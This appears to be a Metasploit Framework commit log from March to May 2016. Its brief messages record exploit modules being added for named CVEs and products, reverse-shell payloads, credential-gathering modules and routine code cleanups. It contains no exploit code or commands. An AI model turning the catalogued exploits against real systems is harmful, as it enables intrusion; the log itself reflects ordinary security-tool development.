2016-05-05 14:18:42 -05:00
William Vu
232cc114de
Change placeholder text to something useful
...
A la Shellshock. :)
2016-05-05 14:18:42 -05:00
William Vu
f32c7ba569
Add template generation details
2016-05-05 14:18:42 -05:00
William Vu
23a0517a01
Update description
2016-05-05 14:18:42 -05:00
William Vu
d7b76c3ab4
Add more references
2016-05-05 14:18:42 -05:00
William Vu
5c04db7a09
Add ImageMagick exploit
2016-05-05 14:18:42 -05:00
Adam Cammack
2e460a87dd
Remove extra assignment
2016-05-05 11:24:19 -05:00
David Maloney
891a788ad4
Land #6849 , mknod to mkfifo
...
lands wvu's pr to switch from mknod to
mkfifo for netcat payloads
2016-05-05 10:34:41 -05:00
Vex Woo
35a780c6a8
fix send_request_cgi redirection issues #6806
2016-05-05 09:55:32 -05:00
Christian Mehlmauer
9357a30725
remove duplicate key
2016-05-04 22:15:33 +02:00
William Vu
74e5772bbf
Replace mknod with mkfifo for portability
...
Works on BSD and OS X now. This has been bugging me for a while.
2016-05-04 02:32:37 -05:00
HD Moore
779a7c0f68
Switch to the default rails server port
2016-05-03 02:06:58 -05:00
HD Moore
8b04eaaa60
Clean up various whitespace
2016-05-03 02:06:37 -05:00
wchen-r7
68ad9b0b53
Land #6835 , support Windows and Java platforms for struts_dmi_exec
2016-05-02 15:04:42 -05:00
wchen-r7
df44dc9c1c
Deprecate exploits/linux/http/struts_dmi_exec
...
Please use exploits/multi/http/struts_dmi_exec, which supports
Windows and Java targets.
2016-05-02 15:03:25 -05:00
Brian Patterson
be363411de
Land #6317 , Add delay(with jitter) option to auxiliary scanner and portscan modules
2016-05-02 13:09:40 -05:00
HD Moore
3300bcc5cb
Make msftidy happier
2016-05-02 02:33:06 -05:00
HD Moore
67c9f6a1cf
Add rails_web_console_v2_code_exec, abuse of a debug feature
2016-05-02 02:31:14 -05:00
join-us
6a00f2fc5a
mv exploits/linux/http/struts_dmi_exec.rb to exploits/multi/http/struts_dmi_exec.rb
2016-05-01 00:00:29 +08:00
join-us
ec66410fab
add java_stager / windows_stager | exploit with only one http request
2016-04-30 23:56:56 +08:00
wchen-r7
73ac6e6fef
Land #6831 , Add CVE-2016-3081 Apache struts s2_032 DMI Code Exec
2016-04-29 11:53:47 -05:00
wchen-r7
d6a6577c5c
Default payload to linux/x86/meterpreter/reverse_tcp_uuid
...
Default to linux/x86/meterpreter/reverse_tcp_uuid for now because
of issue #6833
2016-04-29 11:52:50 -05:00
join-us
288975a9ce
rm modules/exploits/multi/http/struts_dmi_exec.rb
2016-04-30 00:44:31 +08:00
Security Corporation
9d279d2a74
Merge pull request #15 from wchen-r7/pr6831
...
Changes for Apache struts from @wchen-r7
2016-04-30 00:37:53 +08:00
join-us
15ffae4ae8
rename module name
2016-04-30 00:17:26 +08:00
join-us
1d95a8a76d
rename struts_code_exec_dynamic_method_invocation.rb to struts_dmi_exec.rb
2016-04-30 00:13:34 +08:00
wchen-r7
97061c1b90
Update struts_dmi_exec.rb
2016-04-29 11:13:25 -05:00
join-us
9e56bb8358
send http request (get -> post)
2016-04-30 00:08:00 +08:00
wchen-r7
e9535dbc5b
Address all @FireFart's feedback
2016-04-29 11:03:15 -05:00
wchen-r7
6f6558923b
Rename module as struts_dmi_exec.rb
2016-04-29 10:34:48 -05:00
wchen-r7
2f66442f1d
Fix #5191 , bad LHOST format causes shell_to_meterpreter to backtrace
...
When using shell_to_meterpreter via a pivot, the LHOST input's format
might be invalid. This is kind of a design limitation, so first we
check the input, and there is a module doc to go with it to explain
a workaround.
Fix #5191
2016-04-28 23:03:54 -05:00
join-us
643591546e
struts s2_032 rce - linux_stager
2016-04-29 10:49:56 +08:00
wchen-r7
2a91a876ff
Update php/meterpreter_reverse_tcp size
2016-04-27 16:14:38 -05:00
William Vu
c16a02638c
Add Oracle Application Testing Suite exploit
2016-04-26 15:41:27 -05:00
William Vu
0cb555f28d
Fix typo
2016-04-26 15:26:22 -05:00
Adam Cammack
f28d280199
Land #6814 , move stdapi to exist?
2016-04-24 13:41:11 -04:00
wchen-r7
4a95e675ae
Rm empty references
2016-04-24 11:46:08 -05:00
wchen-r7
2edd6869fc
rm references key
2016-04-24 03:09:59 -05:00
Brent Cook
194a84c793
Modify stdapi so it also uses exist? over exists? for ruby parity
...
Also add an alias for backward compatibility.
2016-04-23 17:31:22 -04:00
wchen-r7
816bc91e45
Resolve #6807 , remove all OSVDB references.
...
OSVDB is no longer a vulnerability database, therefore all the
references linked to it are invalid.
Resolve #6807
2016-04-23 12:32:34 -05:00
Brent Cook
9a873a7eb5
more style fixes
2016-04-23 12:18:28 -04:00
Brent Cook
d86174c3bf
style fixes
2016-04-23 12:18:28 -04:00
Brent Cook
4250725b13
fix incorrect hex port conversion
2016-04-23 12:18:28 -04:00
Brent Cook
7ff5a5fd7e
switch mainframe payloads to fixed size
2016-04-23 11:40:05 -04:00
join-us
81af4d2675
Fix: merge error
2016-04-23 23:19:08 +08:00
join-us
1d99d08ac8
rebuild
2016-04-23 23:15:19 +08:00
join-us
de9ac28db1
class Metasploit4 -> class MetasploitModule
2016-04-23 23:03:48 +08:00
join-us
e2fcfc8d09
fix index / space
2016-04-23 23:02:41 +08:00
join-us
fca4d53a6f
add yahoo_search / bing_search exception handler
2016-04-23 22:58:39 +08:00
join-us
d9633078ec
merge yahoo_search_domain[ip] / bing_search_domain[ip]
2016-04-23 22:45:47 +08:00
join-us
66c0832f27
add Rex::Socket.getaddresses exception handler
2016-04-23 20:09:12 +08:00
join-us
b47b83dfaa
add results.nil? / results.empty? check
2016-04-23 19:47:33 +08:00
join-us
7579abb34e
report_note in a line
2016-04-23 19:43:44 +08:00
join-us
55e31bacee
add exception handler
2016-04-23 19:01:55 +08:00
join-us
73121f7e2f
add vprint_good
2016-04-23 18:50:48 +08:00
join-us
bc1f829fe5
class Metasploit4 -> class MetasploitModule
2016-04-23 17:36:22 +08:00
wchen-r7
da9f156913
Print IP in print_*
2016-04-22 16:03:31 -05:00
wchen-r7
3aa02891e9
Bring #6801 up to date with upstream-master
2016-04-22 14:04:26 -05:00
wchen-r7
4a435e8d13
Bring hp_dataprotector_install_service up to date w/ upstream-master
2016-04-22 13:42:41 -05:00
wchen-r7
db1d973ef0
Cosmetic changes for hp_dataprotector_install_service
2016-04-22 13:41:18 -05:00
join-us
16ff74e293
syntax check / code reduce
2016-04-22 10:53:03 +08:00
Vincent Yiu
ca4bcfe62a
Update enum_emet.rb
...
Cleaned up a bit more
2016-04-22 00:41:10 +01:00
Vincent Yiu
c81d0ade3f
Update, implemented
...
Took @bcook-r7's advice
2016-04-22 00:37:03 +01:00
Vincent Yiu
30ac6b4a93
enum_emet
...
A module to enumerate all the EMET wildcard paths.
2016-04-22 00:20:25 +01:00
dmohanty-r7
67968e912c
Land #6785 Add CVE-2016-0854 Advantech WebAccess Arbitrary File Upload
2016-04-21 12:02:04 -05:00
Brent Cook
57ab974737
File.exists? must die
2016-04-21 00:47:07 -04:00
504137480
c08872144f
Update advantech_webaccess_dashboard_file_upload.rb
2016-04-21 09:33:03 +08:00
504137480
dcb9c83f98
Update advantech_webaccess_dashboard_file_upload.rb
2016-04-21 09:28:42 +08:00
Louis Sato
6b3326eab2
Land #6707 , support for LURI handler
2016-04-20 16:26:07 -05:00
wchen-r7
e1e43db551
Land #6789 , remove overwritten keys from hashes
2016-04-20 13:33:31 -05:00
Fakhir Karim Reda zirsalem
f0d403124c
Update symantec_brightmail_ldapcreds.rb
2016-04-20 18:58:12 +02:00
Karim Reda Fakhir
cda104920e
delete telisca abuse
2016-04-20 17:09:13 +01:00
Karim Reda Fakhir
c322a4b314
added modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb
2016-04-20 17:01:18 +01:00
Karim Reda Fakhir
dc3a185519
delete modules/auxiliary/voip/telisca_ips_lock_abuse.rb
2016-04-20 16:48:37 +01:00
Josh Hale
57467b94d9
Fix RegExp evaluation in is_routable? function
2016-04-20 10:22:46 -05:00
Karim Reda Fakhir
5adf5be983
add symantec bright mail ldap creds
2016-04-20 16:05:24 +01:00
Brent Cook
57cb8e49a2
remove overwritten keys from hashes
2016-04-20 07:43:57 -04:00
Karim Reda Fakhir
dfb2b95e46
Merge remote-tracking branch 'upstream/master'
...
Merge
2016-04-20 12:21:16 +01:00
Brian Patterson
b74930f5c9
Land #6771 , Deprecate dns_bruteforce / dns_cache_scraper / dns_info / dns_reverse_lookup / dns_srv_enum
2016-04-19 16:30:36 -05:00
504137480
2400345fff
Merge pull request #2 from open-security/advantech_webaccess_dashboard_file_upload
...
Advantech webaccess dashboard file upload
2016-04-19 12:59:32 +08:00
join-us
0407acc0ec
add print_status with vuln_version?
2016-04-19 11:22:00 +08:00
join-us
c88ddf1cc4
fix NilClass for res.body
2016-04-19 10:27:20 +08:00
Adam Cammack
3da451795c
Fix potential case issue
...
Even though the options were getting put back in a datastore, the
original case could still be lost and that would be bad.
2016-04-18 17:52:27 -04:00
thao doan
fd603102db
Land #6765 , Fixed SQL error in lib/msf/core/exploit/postgres
2016-04-18 10:44:20 -07:00
wchen-r7
89a3755754
Land #6786 , post/windows/manage/autoroute improvements
...
Resolve #6781
2016-04-18 12:11:42 -05:00
xiaozhouzhou
a895b452e6
fix
2016-04-19 00:21:26 +08:00
Brent Cook
c596421b01
use generate_uri_uuid_mode for java reverse_http
2016-04-18 08:26:02 -05:00
Tim
edd30e433e
https tweaks
2016-04-18 08:26:02 -05:00
OJ
555352b210
Force lurl string duplication to avoid stageless issues
...
I have NO idea why this is even a problem. Mutating state is the spawn of satan.
2016-04-18 08:25:19 -05:00
OJ
a74a7dde55
More fixies for LURI in Python, and native too
2016-04-18 08:25:19 -05:00
OJ
06d53112e3
Add support for LURI to the java and android payloads
2016-04-18 08:24:41 -05:00
OJ
b95267997d
Fix LURI support for stageless, transport add/change and code tidies
2016-04-18 08:24:41 -05:00
join-us
ce9b692dd8
add print_status
2016-04-18 20:43:39 +08:00
join-us
7143668671
fix version_match
2016-04-18 20:31:32 +08:00
join-us
897238f3ec
identify fingerpriint / make the code clear
2016-04-18 19:55:42 +08:00
504137480
7d1095bc08
Update advantech_webaccess_dashboard_file_upload.rb
2016-04-18 11:24:03 +08:00
504137480
47b5398152
Update advantech_webaccess_dashboard_file_upload.rb
2016-04-18 11:05:25 +08:00
Josh Hale
48556483b5
Fix a few comments
2016-04-17 19:16:52 -05:00
Josh Hale
32590c89b7
Add interface name to routing status message
2016-04-17 14:15:50 -05:00
504137480
ae23da39b8
Update advantech_webaccess_dashboard_file_upload.rb
2016-04-17 21:23:45 +08:00
504137480
ab9e988dd4
Update advantech_webaccess_dashboard_file_upload.rb
2016-04-17 21:15:03 +08:00
504137480
6c969b1c3b
Update advantech_webaccess_dashboard_file_upload.rb
2016-04-17 18:49:56 +08:00
Josh Hale
fb7194c125
Work on autoroute.md
2016-04-17 00:04:42 -05:00
xiaozhouzhou
32192d3034
Advantech WebAccess Dashboard Viewer Arbitrary File Upload
...
Advantech WebAccess Dashboard Viewer Arbitrary File Upload
2016-04-17 11:29:06 +08:00
Josh Hale
a5e48b6112
Add default option and clean up comments
2016-04-16 19:50:08 -05:00
Josh Hale
6550e0bc1b
Finish up autoadd_interface_routes
2016-04-16 18:42:41 -05:00
Josh Hale
b3d199c055
Add get_subnet_octet and test
2016-04-16 14:57:39 -05:00
Josh Hale
b1064af082
Initial get_subnet testing
2016-04-16 13:50:15 -05:00
Josh Hale
018e7807fe
Identify routable networks
2016-04-15 22:21:54 -05:00
Josh Hale
e8863ba09d
Initial autoadd_interface_routes work
2016-04-15 22:13:17 -05:00
wchen-r7
a434622d21
Land #6769 , Add CVE-2016-1593 Novell ServiceDesk Authenticated Upload
2016-04-15 18:59:37 -05:00
Josh Hale
5f5c330f2b
Initial Testing of Interface Info Gather
2016-04-14 21:59:48 -05:00
wchen-r7
92ef8f4ab3
Land #6751 , Correct proftp version check at module runtime
2016-04-14 15:34:53 -05:00
wchen-r7
f1523d0804
Land #6779 , Add CVE-2016-1531: Exim "perl_startup" Privilege Escalation
2016-04-14 15:16:50 -05:00
Pedro Ribeiro
8dfe98d96c
Add bugtraq reference
2016-04-14 10:23:53 +01:00
Josh Hale
c39410a070
Fix autoadd problem
2016-04-13 23:31:27 -05:00
Brent Cook
6ce7055130
Land #6737 , Added reverse shell JCL payload for z/OS
2016-04-13 22:19:15 -05:00
Brent Cook
09873f2f9c
Land #6717 , Add new cmd mainframe payload (generic_jcl) for z/OS
2016-04-13 22:10:23 -05:00
William Vu
252632a802
Use %w{} for a couple things
...
Why not? :)
2016-04-13 19:38:57 -05:00
William Vu
de004d7da3
Line up some hash rockets
2016-04-13 19:32:35 -05:00
William Vu
f8e4253e2f
Add telnet to RequiredCmd
...
Baffles me that cmd/unix/reverse isn't cmd/unix/reverse_telnet.
2016-04-13 18:22:28 -05:00
William Vu
07ee18a62b
Do something shady with the exploit method
...
Hat tip @acammack-r7.
2016-04-13 18:15:17 -05:00
William Vu
43e74fce9e
Add Exim privesc
2016-04-13 17:51:20 -05:00
wchen-r7
c52a6393b2
Land #6773 , Add Dell Kace K1000 unauthenticated remote root exploit
2016-04-13 10:20:53 -05:00
wchen-r7
1d1a495a93
Style check
2016-04-13 10:19:57 -05:00
CSendner
2319629dd8
Update comments
2016-04-13 05:03:11 +02:00
Christoph Sendner
4970047198
./modules/post/linux/dos/xen_420_dos.rb
2016-04-13 03:31:02 +02:00
Joshua J. Drake
f73309ef01
Fix the ARM NOP generator after #6762 , #6768 , and #6644
2016-04-12 14:22:57 -05:00
Brendan Coles
b61175c6b4
Add Dell Kace K1000 unauthenticated remote root exploit
2016-04-12 16:15:37 +00:00
join-us
815a918a72
deprecate auxiliary/gather/dns_srv_enum
2016-04-12 08:44:47 +08:00
join-us
2bbb58d57e
deprecate auxiliary/gather/dns_reverse_lookup
2016-04-12 08:44:21 +08:00
join-us
5e1c540d31
deprecate auxiliary/gather/dns_info
2016-04-12 08:43:50 +08:00
join-us
67f8b309c6
deprecate auxiliary/gather/dns_cache_scraper
2016-04-12 08:43:23 +08:00
join-us
66ec001110
deprecate auxiliary/gather/dns_bruteforce
2016-04-12 08:42:56 +08:00
Jon Hart
ca6beeb676
Land #6187 , @join-us' cleanup for enum_dns
2016-04-11 09:50:12 -07:00
Pedro Ribeiro
2dc4539d0d
Change class name to MetasploitModule
2016-04-10 23:27:40 +01:00
Pedro Ribeiro
1fa7c83ca1
Create file for CVE-2016-1593
2016-04-10 23:17:07 +01:00
Brent Cook
99b4d0a2d5
remove more regex-style bool checks
2016-04-09 13:49:16 -05:00
Jon Hart
a37f9c9eda
Clarify note type
2016-04-08 18:35:43 -07:00
Jon Hart
44a98cc36f
Correct overly aggressive style cleanup
2016-04-08 18:00:03 -07:00
Jon Hart
7ce5c07c03
Minor style cleanup
2016-04-08 17:39:32 -07:00
Jon Hart
7c70a554ea
Merge branch 'pr/6187' into pr/fixup-6187 for pre-master merge testing
2016-04-08 16:56:38 -07:00
William Vu
8219766538
Land #6760 , llmnr_response TTL fix
2016-04-08 16:45:55 -05:00
wchen-r7
6b4dd8787b
Fix #6764 , nil SQL error in lib/msf/core/exploit/postgres
...
Fix #6764
2016-04-08 15:20:04 -05:00
wchen-r7
28875313be
Change class name to MetasploitModule
2016-04-08 14:27:52 -05:00
wchen-r7
ae46b5a688
Bring #6417 up to date with upstream-master
2016-04-08 13:41:40 -05:00
Brent Cook
5839e2e3a8
Land #6762 , Fix ghetto true/false checking in NOP generator
2016-04-07 19:38:24 -05:00
William Vu
068cf8eba1
Fix ghetto true/false checking in NOP generator
2016-04-07 18:23:33 -05:00
wchen-r7
cba7353e1d
Fix another typo?
2016-04-07 17:12:11 -05:00
wchen-r7
ff9d94218d
Fix a typo?
2016-04-07 17:11:42 -05:00
wchen-r7
a3c390ee9d
Change class name to MetasploitModule
2016-04-07 17:11:08 -05:00
wchen-r7
f09637a1c7
Bring #6377 up to date with upstream-master
2016-04-07 17:06:49 -05:00
wchen-r7
0d3eb4f055
Change class name to MetasploitModule
2016-04-07 12:15:32 -05:00
wchen-r7
0f56dbd858
Bring #6378 up to date with upstream-master
2016-04-07 12:10:55 -05:00
wchen-r7
c4aac2a54a
Remove unwanted comments
2016-04-07 11:22:57 -05:00
Sonny Gonzalez
fa5acba400
TTL setting honors TTL option
...
* change hard-coded ttl value to TTL option
* set TTL option default to 30
2016-04-07 10:59:05 -05:00
James Lee
7658014fb7
Add CVEs
2016-04-07 08:39:29 -05:00
James Lee
87d59a9bfb
Add exploit for ExaGrid known credentials
2016-04-07 04:17:43 -05:00
wchen-r7
e78e12f295
Land #6515 , Autoadd for /post/windows/manage/autoroute
2016-04-06 15:29:58 -05:00
wchen-r7
ac051bda7f
Add check is_routable?, and change netmask if needed
2016-04-06 15:28:54 -05:00
William Vu
11bf1018aa
Fix typo
2016-04-06 14:20:41 -05:00
wchen-r7
d240e0b3a2
Bring #6515 up to date with upstream-master
2016-04-06 11:27:32 -05:00
all3g
616bb8399f
remove db_filter / format a json data
2016-04-06 18:39:34 +08:00
William Vu
a4ef9980f4
Land #6677 , atutor_sqli update
2016-04-05 19:52:44 -05:00
William Vu
d9d257cb1a
Fix some things
2016-04-05 19:23:11 -05:00
greg.mikeska@rapid7.com
08736c798d
Correct proftp version check at module runtime
2016-04-05 13:06:10 -05:00
William Vu
dcb6da306c
Land #6720 , SSL scanner fixes
2016-04-04 23:37:52 -05:00
Brent Cook
af7eef231c
Fix a few issues with the SSL scanner
...
First, we need to handle public keys with strength not measured on the same bit
scale as RSA keys. This fixes handshakes for ECDSA and others.
Second, depending on the host we are talking to, we may not have a peer cert.
Handle this properly by checking first on the socket before using it.
2016-04-04 22:08:01 -05:00
wchen-r7
51b8b4a4d1
Bring #6404 up to date with upstream-master
2016-04-04 16:35:58 -05:00
wchen-r7
da3388248a
Uses #blank?
2016-04-04 16:34:49 -05:00
wchen-r7
5a6d1ee0a9
Uses MetasploitModule class name
2016-04-04 16:30:55 -05:00
William Vu
2e1e1ca839
Land #6742 , psexec_psh restoration
2016-04-01 13:59:09 -05:00
William Vu
d23a1c4551
Bump deprecation date
2016-04-01 13:57:58 -05:00
William Vu
60bee16e8c
Restore psexec_psh
...
See @jabra-'s comments on #6222 .
2016-04-01 13:56:22 -05:00
William Vu
41b802a8a2
Clean up module
2016-04-01 13:54:27 -05:00
Bigendian Smalls
6a4d7e3b58
Revshell cmd JCL payload for z/OS
...
Added a JCL-based reverse shell. Uses the same source code as the
shellcode version does. Source code is in
external/source/shellcode/mainframe/shell_reverse_tcp.s
2016-03-31 20:42:42 -05:00
wchen-r7
ae0aecdd03
Change class name for exploits/windows/ftp/pcman_put.rb
2016-03-31 19:36:02 -05:00
wchen-r7
de0e02549c
Bring #6507 up to date with upstream-master
2016-03-31 19:30:45 -05:00
wchen-r7
f3336c7003
Update windows/http/easyfilesharing_seh
2016-03-31 19:24:06 -05:00
wchen-r7
dd83757966
Bring #6488 up to date with upstream-master
2016-03-31 19:11:11 -05:00
wchen-r7
75ebd08153
Land #6731 , Add CVE-2015-7755 juniper backdoor
2016-03-31 17:30:38 -05:00
wchen-r7
618f379488
Update auxiliary/scanner/redis/redis_server and mixin
2016-03-31 17:14:49 -05:00
wchen-r7
4d76b0e6a5
Rm auxiliary/scanner/misc/redis_server
...
Please use auxiliary/scanner/redis/redis_server or
auxiliary/scanner/redis/redis_login instead
2016-03-31 17:13:08 -05:00
wchen-r7
2e7d07ff53
Fix PASSWORD datastore option
2016-03-31 17:12:00 -05:00
wchen-r7
545cb11736
Bring #6409 up to date with upstream-master
2016-03-31 17:00:56 -05:00
wchen-r7
5fdea91e93
Change naming
2016-03-31 17:00:29 -05:00
wchen-r7
f33e994050
Delete anything related to configuring/saving username
2016-03-31 16:56:54 -05:00
Brent Cook
1ea7cf27a3
remove StackAdjustment from psexec
2016-03-30 23:38:46 -05:00
wchen-r7
101775a5ba
Bring #6545 up to date with upstream-master
2016-03-30 16:07:24 -05:00
thao doan
82cec68606
Land #6427 , removes the deprecated psexec_psh module; please use exploit/windows/smb/psexec instead
2016-03-30 12:58:43 -07:00
William Vu
dee9adbc50
Remove deprecated psexec_psh module
2016-03-30 14:35:47 -05:00
wchen-r7
4074634a13
Land #6713 , Add post exploit module for HeidiSQL's stored passwords
2016-03-30 12:10:30 -05:00
wchen-r7
0c6b4d81c8
More proper exception handling
2016-03-30 12:09:40 -05:00
wchen-r7
aaa1515ba0
Print rhost:rport
2016-03-30 11:56:09 -05:00
wchen-r7
c7e63c3452
Land #6694 , Add Apache Jetspeed exploit
...
CVE-2016-0710
CVE-2016-0709
2016-03-30 11:17:21 -05:00
wchen-r7
74f25f04bd
Make sure to always print the target IP:Port
2016-03-30 11:16:41 -05:00
Meatballs
397d5580be
Use MetasploitModule convention
2016-03-30 15:44:37 +01:00
Meatballs
f8628e3438
Merge remote-tracking branch 'upstream/master' into wdigest_enable
2016-03-30 15:44:21 +01:00
Meatballs
9e45f0c104
Minor tidies
2016-03-30 15:29:03 +01:00
h00die
7fc2c860e9
remove comment
2016-03-29 21:26:36 -04:00
h00die
d35b5e9c2a
First add of CVE-2015-7755
2016-03-29 21:20:12 -04:00
Brent Cook
85ab9d38f7
Land #6698 , Add ATutor 2.2.1 Directory Traversal Exploit
2016-03-29 15:42:58 -05:00
Brendan Watters
b84bf2290f
Land #6707 Print Response fix for HTTP NTLM
2016-03-29 13:35:49 -05:00
Brendan Watters
824a7837a2
LAND #6707 , Print Response Fix for HTTP NTLM
2016-03-29 13:08:43 -05:00
Bigendian Smalls
a6518b5273
Add generic JCL cmd payload for z/OS (mainframe)
...
This payload does nothing but return successfully. It can be used to
test exploits and as a basis for other JCL cmd payloads.
2016-03-28 21:01:39 -05:00
Hans-Martin Münch (h0ng10)
976932ed43
Initial commit
2016-03-26 12:00:25 +01:00
wchen-r7
57984706b8
Resolve merge conflict with Gemfile
2016-03-24 18:13:31 -05:00
William Vu
2b90846268
Add Apache Jetspeed exploit
2016-03-23 19:22:32 -05:00
dmohanty-r7
6a462d5f60
Land #6703 , Make ms09_065_eot_integer passive
2016-03-23 13:39:41 -05:00
Adam Cammack
8fb55eeb6b
Land #6700 , add aux module to gather browser info
2016-03-23 13:19:27 -05:00
wchen-r7
8c5c0086e6
Change cve_2012_6301 module path & make passive
...
This addresses two things:
1. The module is in the wrong directory. dos/http is for http
servers, not browsers.
2. PassiveActions should not be a 2D array.
2016-03-23 11:10:23 -05:00
wchen-r7
53860bef1f
Make ms09_065_eot_integer passive
...
MS-932
2016-03-23 10:50:24 -05:00
wchen-r7
8bf039a69e
ignore_items! should not be used in a loop
...
because it's not necessary.
2016-03-22 15:56:38 -05:00
wchen-r7
102d28bda4
Update atutor_filemanager_traversal
2016-03-22 14:44:07 -05:00
wchen-r7
9cb43f2153
Update atutor_filemanager_traversal
2016-03-22 14:42:36 -05:00
wchen-r7
8836393cb1
Add aux module to gather browser information.
2016-03-22 13:56:12 -05:00
Lexus89
8028a9b5ce
Print response fix
2016-03-22 18:50:25 +01:00
Steven Seeley
3842009ffe
Add ATutor 2.2.1 Directory Traversal Exploit Module
2016-03-22 12:17:32 -05:00
h00die
ebc7316442
Spelling Fix
...
Fixed Thorugh to Through
2016-03-19 13:58:13 -04:00
Adam Cammack
570221379e
Land #6533 , move ie_unsafe_scripting to BES
2016-03-18 11:22:44 -05:00
James Lee
d54bbdf9a3
Land #6566 , filezilla xml file locations
2016-03-17 16:27:24 -05:00
James Lee
115a033036
Fix parsing the Last Server xml
2016-03-17 16:27:02 -05:00
wchen-r7
31279291c2
Resolve merge conflict for ie_unsafe_scripting.rb
2016-03-17 14:42:36 -05:00
wchen-r7
b1b68294bb
Update class name
2016-03-17 14:41:23 -05:00
wchen-r7
7b2d717280
Change ranking to manual and restore BAP2 count to 21
...
Since the exploit requires the target to be configured manually,
it feel more appropriate to be ManualRanking.
2016-03-17 14:39:28 -05:00
James Lee
1375600780
Land #6644 , datastore validation on assignment
2016-03-17 11:16:12 -05:00
Brent Cook
e9f87d2883
Land #6685 , ensure platform variable is set for non-osx
2016-03-17 08:25:42 -05:00
James Lee
9e7a330ac8
OptInt -> OptPort
2016-03-16 15:47:29 -05:00
James Lee
af642379e6
Fix some OptInts
2016-03-16 14:13:18 -05:00
James Lee
c21bad78e8
Fix some more String defaults
2016-03-16 14:13:18 -05:00
Spencer McIntyre
4e3a188f75
Land #6401 , EasyCafe server file retrieval module
2016-03-16 13:24:54 -04:00
Spencer McIntyre
9ac4ec4bfc
Update the class name to MetasploitModule
2016-03-16 13:22:06 -04:00
Spencer McIntyre
53f1338ad0
Update module to remove references to print peer
2016-03-16 13:10:39 -04:00
Brent Cook
1769bad762
fix FORCE logic
2016-03-16 09:53:09 -05:00
Brent Cook
d70308f76e
undo logic changes in adobe_flas_otf_font
2016-03-16 09:52:21 -05:00
Tim
f83cb4ee32
fix set_wallpaper
2016-03-16 13:07:41 +00:00
wchen-r7
5ef8854186
Update ATutor - Remove Login Code
2016-03-15 17:37:37 -05:00
Adam Cammack
05f585157d
Land #6646 , add SSL SNI and unify SSLVersion opts
2016-03-15 16:35:22 -05:00
l0gan
e29fc5987f
Add missing stream.raw for hp_sitescope_dns_tool
...
This adds the missing stream.raw.
2016-03-15 11:06:06 -05:00
rwhitcroft
c12cc10416
change class Metasploit to MetasploitModule
2016-03-14 17:57:29 -04:00
rwhitcroft
dd53625f4a
change Metasploit3 to Metasploit to satisfy travis
2016-03-14 16:52:02 -04:00
rwhitcroft
a26c90fd41
fix RPORT option
2016-03-14 16:27:44 -04:00
wchen-r7
38153d227c
Move apache_karaf_command_execution to the SSH directory
...
apache_karaf_command_execution does not gather data, therefore
it is not suitable to be in the gather directory.
2016-03-14 00:32:59 -05:00
William Vu
6323f7f872
Fix a couple overlooked issues
2016-03-13 23:35:05 -05:00
Brent Cook
df0ff30468
Land #6642 , make ipv6_neighbor_router_advertisement discovery smarter
2016-03-13 16:53:11 -05:00
Brent Cook
635e31961a
generate valid prefixes
2016-03-13 16:44:57 -05:00
Brent Cook
cd84ac37d6
Land #6569 , check if USERNAME env var exists before using in enum_chrome post module
2016-03-13 15:12:51 -05:00
Brent Cook
a50b21238e
Land #6669 , remove debug code from apache_roller_ognl_injection that breaks Windows
2016-03-13 14:14:10 -05:00
Brent Cook
23eeb76294
update php_utility_belt_rce to use MetasploitModule
2016-03-13 13:59:47 -05:00
Brent Cook
a6316d326e
Land #6662 , update disclosure date for php_utility_belt_rce
2016-03-13 13:58:04 -05:00
Brent Cook
c89e53d0a3
Land #6666 , fix filezilla_server display bug showing the session ID
2016-03-13 13:56:44 -05:00
Brent Cook
dabe5c8465
Land #6655 , use MetasploitModule as module class name
2016-03-13 13:48:31 -05:00
wchen-r7
b22a057165
Fix #6554 , hardcoded File.open path in apache_roller_ognl_injection
...
The hardcoded File.open path was meant for debugging purposes during
development, but apparently we forgot to remove it. This line causes
the exploit to be unusable on Windows platform.
Fix #6554
2016-03-11 18:48:17 -06:00
wchen-r7
51cdb57d42
Fix #6569 , Add a check for USERNAME env var in enum_chrome post mod
...
Fix #6569
Depending on the context, the USERNAME environment variable might
not always be there.
2016-03-11 15:36:44 -06:00
James Lee
8217d55e25
Fix display issue when SESSION is -1
2016-03-11 11:37:22 -06:00
Jay Turla
8953952a8f
correction for the DisclosureDate based on Exploit-DB
2016-03-11 14:05:26 +08:00
James Barnett
7009682100
Landing #6659 , Fix bug in MS08-067 related to incorrect service pack identification when fingerprinting
2016-03-10 14:29:29 -06:00
William Vu
8d22358892
Land #6624 , PHP Utility Belt exploit
2016-03-09 14:12:45 -06:00
William Vu
52d12b68ae
Clean up module
2016-03-09 14:08:26 -06:00
wchen-r7
179d38b914
Fix #6658 , MS08-067 unable to find the right target for W2k3SP0
...
Fix #6658 .
When there is no service pack, the
Msf::Exploit::Remote::SMB#smb_fingerprint_windows_sp method returns
an empty string. But in the MS08-067 exploit, instead of check an
empty string, it checks for "No Service Pack", which causes it to
never detect the right target for Windows Server 2003 SP0.
2016-03-09 11:05:34 -06:00
Fakhri Zulkifli
45c7e4b6ae
Update ipv6_neighbor_router_advertisement.rb
2016-03-09 11:21:24 +08:00
Fakhri Zulkifli
e417909111
Update ipv6_neighbor_router_advertisement.rb
2016-03-09 11:21:07 +08:00
rwhitcroft
f155477edf
improve description and change behavior to keep trying on connection errors
2016-03-08 12:33:17 -05:00
Christian Mehlmauer
3123175ac7
use MetasploitModule as a class name
2016-03-08 14:02:44 +01:00
wchen-r7
c2f99b559c
Add documentation for auxiliary/scanner/http/tomcat_enum
...
Also fix a typo in normalizer
2016-03-07 15:39:15 -06:00
Brent Cook
f703fa21d6
Revert "change Metasploit3 class names"
...
This reverts commit 666ae14259
.
2016-03-07 13:19:55 -06:00
Brent Cook
44990e9721
Revert "change Metasploit4 class names"
...
This reverts commit 3da9535e22
.
2016-03-07 13:19:48 -06:00
Brent Cook
0e46cc0259
Revert "change remaining class names"
...
This reverts commit 62217fff2b
.
2016-03-07 13:19:42 -06:00
Brent Cook
aa5b201427
Revert "revert ssl_login_pubkey for now"
...
This reverts commit 7d773b65b6
.
2016-03-07 13:19:33 -06:00
Christian Mehlmauer
7d773b65b6
revert ssl_login_pubkey for now
2016-03-07 14:44:23 +01:00
Christian Mehlmauer
62217fff2b
change remaining class names
2016-03-07 09:58:21 +01:00
Christian Mehlmauer
3da9535e22
change Metasploit4 class names
2016-03-07 09:57:22 +01:00
Christian Mehlmauer
666ae14259
change Metasploit3 class names
2016-03-07 09:56:58 +01:00
Brent Cook
bb36cd016e
Fix #6643 , Pcap.lookupaddrs does not exist
2016-03-06 22:15:39 -06:00
Brent Cook
eea8fa86dc
unify the SSLVersion fields between modules and mixins
...
